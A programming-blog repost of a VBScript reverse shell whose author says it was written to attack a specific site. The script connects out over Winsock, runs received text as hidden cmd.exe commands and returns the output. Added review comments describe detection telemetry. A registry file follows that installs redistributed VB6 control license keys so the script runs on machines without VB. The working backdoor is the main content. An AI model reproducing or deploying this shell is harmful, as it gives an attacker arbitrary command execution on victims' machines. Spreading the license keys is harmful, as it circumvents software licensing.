
TCP版backshell的VBS脚本代码

程序员文章站 2022-03-21 11:05:55
'搞一个特殊的站准备用的,没想到,等写完了,洞补上了,郁闷
'by 009, baicker@hotmail.com
'date:071221

' Script-level setup: creates the three COM objects used by the event handlers
' below and starts an outbound TCP connection.
' NOTE(review): defender view - a Windows Script Host process that instantiates
' "mswinsock.winsock" together with "wscript.shell" and then opens a TCP
' connection is a strong signal for script-based remote command execution;
' script-host process creation, COM object loads and outbound connections from
' wscript.exe/cscript.exe are the telemetry that would surface it.
dim revdata
' The second argument is the event prefix: the control's events are delivered to
' the subs named wsevent_connect and wsevent_dataarrival in this file.
set sock=wscript.createobject( "mswinsock.winsock" , "wsevent_" )
' Shell object used later to launch cmd.exe.
set sc=createobject( "wscript.shell" )
' File system object used later for the temporary output file.
set fso =createobject( "scripting.filesystemobject" )
' As posted, the peer is the loopback address on TCP port 1234.
sock.connect "127.0.0.1" , 1234

' Event handler for the socket's connect event (bound through the "wsevent_"
' prefix). It only reports the connection through wscript.echo; it sends
' nothing to the peer.
sub wsevent_connect()
wscript.echo "connected!"
end sub

' Event handler for incoming socket data (bound through the "wsevent_" prefix).
' bytes: the byte count passed in by the control; the handler acts only when it
' is greater than 0.
' Behaviour: text containing "exit" closes the socket and sets bclose; any
' other text is run as a cmd.exe command line, its redirected output is sent
' back, and the prompt string "009>" is sent.
' NOTE(review): risk - whoever controls the remote end of the socket gets
' arbitrary command execution with the privileges of the account running the
' script; the received text is not authenticated, validated or logged.
' NOTE(review): detection - look for wscript.exe/cscript.exe spawning
' "cmd.exe /c ... > c:\<generated name>" with a hidden window, and for
' short-lived files created and force-deleted directly under c:\.
sub wsevent_dataarrival(bytes)
mystring= "blank" 
' Read the received data into mystring and keep a copy in the script-level revdata.
sock.getdata mystring
revdata=mystring
if bytes> 0 then
' instr is called without a compare argument, so the match on "exit" is a
' case-sensitive substring match anywhere in the received text.
if instr(revdata, "exit" )> 0 then
sock.close
sock.close
sock= nothing
' bclose is the flag tested by the script-level wait loop.
bclose= true
exit sub
else
' From here to the end of the sub, runtime errors are suppressed rather than reported.
on error resume next
' Output file sits in the root of c:\ under a name generated by gettempname
' (typically rad*.tmp - confirm on the target Windows version).
tempfile= "c:\" & fso.gettempname
' Drops the last character of the received text (presumably a trailing
' newline - confirm against the sender).
cmd=left(revdata,len(revdata)- 1 )
' Window style 0 hides the window; true makes run wait for cmd.exe to finish.
' Only standard output is redirected to the file.
call sc.run ( "cmd.exe /c " & cmd & " > " & tempfile, 0 , true )
' Open for reading (1), do not create (false), ASCII format (0).
set txf = fso.opentextfile(tempfile, 1 , false , 0 )
sock.senddata txf.readall & vbcrlf & vbcrlf
txf.close
' Forced delete (true) removes the output file after it has been sent.
call fso.deletefile(tempfile, true )
end if
' Prompt string sent after each handled command; a stable on-the-wire marker
' for this script.
sock.senddata "009>"
end if
end sub

' Keeps the script host process alive so the socket events above can fire:
' sleeps 1 ms per iteration until bclose becomes true. bclose is assigned only
' inside wsevent_dataarrival in the visible code.
while not bclose
wscript.sleep 1
wend

—————————————————————————————————————
脚本调用 Winsock 控件;未安装 VB 的机器需要先导入下面的注册表项。
—————————————— vb6controls.reg —————————————————-
regedit
hkey_classes_root\licenses = licensing: copying the keys may be a violation of established copyrights.

// masked edit control 6.0 license key
hkey_classes_root\licenses\bc96f860-9928-11cf-8afa-00aa00c00905 = mmimfflflmqmlfffrlnmofhfkgrlmmfmqkqj

// chart control 6.0 (oledb) license key
hkey_classes_root\licenses\12b142a4-bd51-11d1-8c08-0000f8754da1 = aadhgafabafajhchnbchehfambfbbachmfmb

// common dialog control 6.0 license key
hkey_classes_root\licenses\4d553650-6abe-11cf-8adb-00aa00c00905 = gfjmrfkfifkmkfffrlmmgmhmnlulkmfmqkqj

// ado data control 6.0 (oledb) license key
hkey_classes_root\licenses\c4145310-469c-11d1-b182-00a0c922e820 = konhqhioohihphkouimonhqhvnwiqhhhnjti

// common controls-3 6.0 license key
hkey_classes_root\licenses\38911da0-e448-11d0-84a3-00dd01104159 = mcpckchcdchjcjcclidcgcgchdqdcjhcojpd

// windows common controls-2 5.0 (sp2) license key
hkey_classes_root\licenses\9e799bf1-8817-11cf-958f-0020afc28c3b = uqpqnqkjujkjjjjqwktjrjkjtkupsjnjtoun

// windows common controls license key
hkey_classes_root\licenses\57cbf9e0-6aa7-11cf-8adb-00aa00c00905 = aahakhchghkhfhaamghhbhbhkbpgfhahlfle

// data bound grid control 5.0(sp3) license key
hkey_classes_root\licenses\556c75f1-efbc-11cf-b9f3-00a0247033c4 = xybiedobrqsprbijaegcbislrsiucfjdhisl

// data bound list controls 6.0 license key
hkey_classes_root\licenses\096efc40-6abf-11cf-850c-08002b30345d = knsgigmnmngnmnigthmgpninrmumhgkgrlrk

// internet transfer control 6.0 license key
hkey_classes_root\licenses\78e1bdd1-9941-11cf-9756-00aa00c00908 = yjrjvqkjlqqjnqkjvprqsjnjvkuknjpjtoun

// multimedia control 6.0 license key
hkey_classes_root\licenses\b1efccf0-6ac1-11cf-8adb-00aa00c00905 = qqkjvqpqmqjjpqjjvpqqkqmqvkypoqjquoun

// chart control 6.0 license key
hkey_classes_root\licenses\7c35ca30-d112-11cf-8e72-00a0c90f26f8 = whmhmhohmhiorhkouimhihihwiwinhlosmsl

// windows common controls-2 6.0 license key
hkey_classes_root\licenses\4f86badf-9f77-11d1-b1b7-0000f8753f5d = iplpwpnippopupiivjrioppisjsjlpiiokuj

// windows common controls 6.0 license key
hkey_classes_root\licenses\ed4b87c4-9f76-11d1-8bf7-0000f8754da1 = knlggnmntgggrninthpgmnngrhqhnnjnslsh

// comm control 6.0 license key
hkey_classes_root\licenses\4250e830-6ac2-11cf-8adb-00aa00c00905 = kjljvjjjoquqmjjjvpqqkqmqykypoqjquoun

// datagrid control 6.0 (oledb) license key
hkey_classes_root\licenses\cde57a55-8b86-11d0-b3c6-00a0c90aea82 = ekpkhddkjkekpdjkqemkfkldoeoefkfdjfqe

// datalist control 6.0 (oledb) license key
hkey_classes_root\licenses\a133f000-ccb0-11d0-a316-00aa00688b10 = cibbcimbpihbbbbbnhdbeidiocmcbbdbgdoc

// dbwin license key
hkey_classes_root\licenses\d015b071-d2ed-11d0-a31a-00aa00688b10 = gjdcfjpcmjicjcdcoihcechjlioiccechepd

// msdbrpt license key
hkey_classes_root\licenses\9df1a470-ba8e-11d0-849c-00a0c90dc8a9 = cchcqjejhcgcqcfjpdfcdjkckiqikchcojpd

// flexgrid control 6.0 license key
hkey_classes_root\licenses\72e67120-5959-11cf-91f6-c2863c385e30 = ibcbbbebqbdbciebmcobmbhifcmciibblgmf

// mapi controls 6.0 license key
hkey_classes_root\licenses\899b3e80-6ac6-11cf-8adb-00aa00c00905 = wjsjjjlqmjpjrjjjvpqqkqmqukypoqjquoun

// msrdo 2.0 license key
hkey_classes_root\licenses\b1692f60-23b0-11d0-8e95-00a0c90f26f8 = mjjjccncgjijrcfjpdfjfcejpdkdkcgjojpd

// remotedata control 6.0 license key
hkey_classes_root\licenses\43478d75-78e0-11cf-8e78-00a0d100038e = imshohohphlmnhimuinmphmmuiminhlmsmsl

// windowless controls 6.0 license key
hkey_classes_root\licenses\80e80ef0-dbbe-11d0-bce2-00a0c90dca10 = qijimitpmpnpxplpvjnikpkpqoxjmpkpoivj

// pictureclip control 6.0 license key
hkey_classes_root\licenses\6fb38640-6ac7-11cf-8adb-00aa00c00905 = gdjkokgdldikhdddpjkkekgknesjikdkoioh

// rich textbox control 6.0 license key
hkey_classes_root\licenses\dc4d7920-6ac8-11cf-8adb-00aa00c00905 = iokouhloohrojhhhtnooiokomiwnmohosmsl

// sheridan tab control license key
hkey_classes_root\licenses\190b7910-992a-11cf-8afa-00aa00c00905 = gclclcejjcmjdcccoikjlcecoioijjcjnhng

// sysinfo control 6.0 license key
hkey_classes_root\licenses\e32e2733-1bc5-11d0-b8c3-00a0c90dca10 = kmhfimlflmmfpffmsgfmhmimngtghmoflhsg

// winsock control 6.0 license key
hkey_classes_root\licenses\2c49f800-c2dd-11cf-9ad6-0080c7e7b78d = mlrljgrlhltlngjlthrligklpkrhllglqlrk